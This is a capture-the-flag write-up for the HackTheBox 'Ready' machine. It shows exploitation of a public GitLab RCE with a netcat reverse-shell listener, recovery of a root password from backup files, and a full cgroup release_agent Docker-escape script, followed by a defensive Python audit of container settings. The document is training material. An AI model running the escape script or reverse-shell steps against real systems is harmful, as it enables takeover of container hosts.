HackTheBox Ready WriteUp

Overview:

Ready is an interesting box that teaches Docker breakout. It starts with a vulnerable GitLab instance that has a public exploit. After getting onto the box, I realized I was inside a Docker container, and the container was configured in a way that allows executing commands outside the container and getting code execution as root on the host. With all that being said, let's jump in!

Reconnaissance:

┌─[eu-vip-3]─[10.10.14.6]─[root@parrot]─[~/htb/boxes/ready]
└──╼ [★]$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 10:09 BST
Nmap scan report for 10.10.10.220
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds

The nmap scan shows the URL http://10.10.10.220:5080/users/sign_in; heading over there, we can see a GitLab instance.

Create an account, then log in and check the version.

Searching for public exploits for this version turns up an RCE exploit.

Usage: python3 exploit.py -u username -p password -g http://10.10.10.220 -l 10.10.14.x -P 443
Listener (in another terminal): nc -nvlp 443

PrivEsc to root:

In /opt/backup there are config files, and we can grep root's password out of them.

After getting root, I realized I'm in a Docker container. But the blog post below explains how to break out of Docker.

I created a payload based on the above blog. It mounts the cgroup filesystem under /tmp and then executes a command outside the container; you can change cat /root/root.txt to a reverse shell if you want.

# Mount a cgroup v1 hierarchy (rdma controller) under /tmp and create a child cgroup
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Ask the kernel to run the release_agent when the child cgroup becomes empty
echo 1 > /tmp/cgrp/x/notify_on_release
# The container's overlay upperdir, i.e. the path the host uses for this container's /
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# release_agent runs on the host, so it needs the host-side path (double quotes so $host_path expands)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /root/root.txt > $host_path/output" >> /cmd
chmod a+x /cmd
# Put a short-lived shell into the child cgroup; when it exits, the cgroup empties and the release_agent fires
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

As we can see, it writes the root flag to /output.
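The breakout above only works because of how the container was started: mounting a cgroup filesystem and writing to release_agent needs CAP_SYS_ADMIN and no AppArmor/seccomp profile blocking mount(2), which is exactly what --privileged (or CapAdd SYS_ADMIN plus unconfined profiles) hands out. The following host-side audit is an added example, not code from the write-up or from the box; it reads the JSON that docker inspect prints and flags containers whose HostConfig or Mounts make this class of escape possible. The three container records are constructed samples, and the field names (HostConfig.Privileged, CapAdd, CapDrop, SecurityOpt, Mounts) follow the docker inspect output format.

```python
import json
import sys

# Constructed sample of `docker inspect` output: a privileged container, a container with
# CAP_SYS_ADMIN plus a writable cgroup bind mount, and a hardened one.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/gitlab",
        "HostConfig": {"Privileged": True, "CapAdd": None, "CapDrop": None, "SecurityOpt": None},
        "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/gitlab/_data",
                    "Destination": "/var/opt/gitlab", "RW": True}],
    },
    {
        "Name": "/api",
        "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"], "CapDrop": None,
                       "SecurityOpt": ["apparmor=unconfined"]},
        "Mounts": [{"Type": "bind", "Source": "/sys/fs/cgroup",
                    "Destination": "/sys/fs/cgroup", "RW": True}],
    },
    {
        "Name": "/web",
        "HostConfig": {"Privileged": False, "CapAdd": None, "CapDrop": ["ALL"],
                       "SecurityOpt": ["no-new-privileges:true"]},
        "Mounts": [],
    },
])

# Host paths that, when bind-mounted writable, expose cgroup or Docker control surfaces.
HOST_SENSITIVE_PATHS = ("/", "/sys", "/sys/fs/cgroup", "/proc", "/var/run/docker.sock", "/var/lib/docker")


def audit_container(container):
    """Return the list of settings that would let a root process escape via cgroup release_agent."""
    hc = container.get("HostConfig") or {}
    findings = []
    if hc.get("Privileged"):
        findings.append("Privileged: all capabilities, no AppArmor/seccomp confinement, /sys writable")
    for cap in hc.get("CapAdd") or []:
        if cap.upper().replace("CAP_", "") in ("SYS_ADMIN", "ALL"):
            findings.append(f"CapAdd {cap}: grants mount(2), so a cgroup filesystem can be mounted inside")
    for opt in hc.get("SecurityOpt") or []:
        if opt in ("apparmor=unconfined", "seccomp=unconfined"):
            findings.append(f"SecurityOpt {opt}: drops the profile that normally denies mount")
    for mount in container.get("Mounts") or []:
        src = mount.get("Source", "")
        if mount.get("Type") == "bind" and mount.get("RW") and (
            src in HOST_SENSITIVE_PATHS or src.startswith("/sys/fs/cgroup")
        ):
            findings.append(f"writable bind mount of host {src}: cgroup files reachable without mounting")
    return findings


def audit_inspect_json(text):
    """Map container name -> findings for every container in `docker inspect` output."""
    return {c["Name"]: audit_container(c) for c in json.loads(text)}


if __name__ == "__main__":
    # Usage: docker inspect $(docker ps -q) > inspect.json && python3 audit.py inspect.json
    # Without an argument the constructed sample is audited.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_INSPECT
    for name, findings in audit_inspect_json(data).items():
        print(f"{name}: {'OK' if not findings else 'AT RISK'}")
        for finding in findings:
            print(f"  - {finding}")
```

Containers that do not need host-level privileges are best run with --cap-drop=ALL, the default AppArmor and seccomp profiles left in place, and --security-opt no-new-privileges; the /web record above shows what such a configuration looks like in docker inspect output, and the audit reports nothing for it.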

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP

Jim Solomon
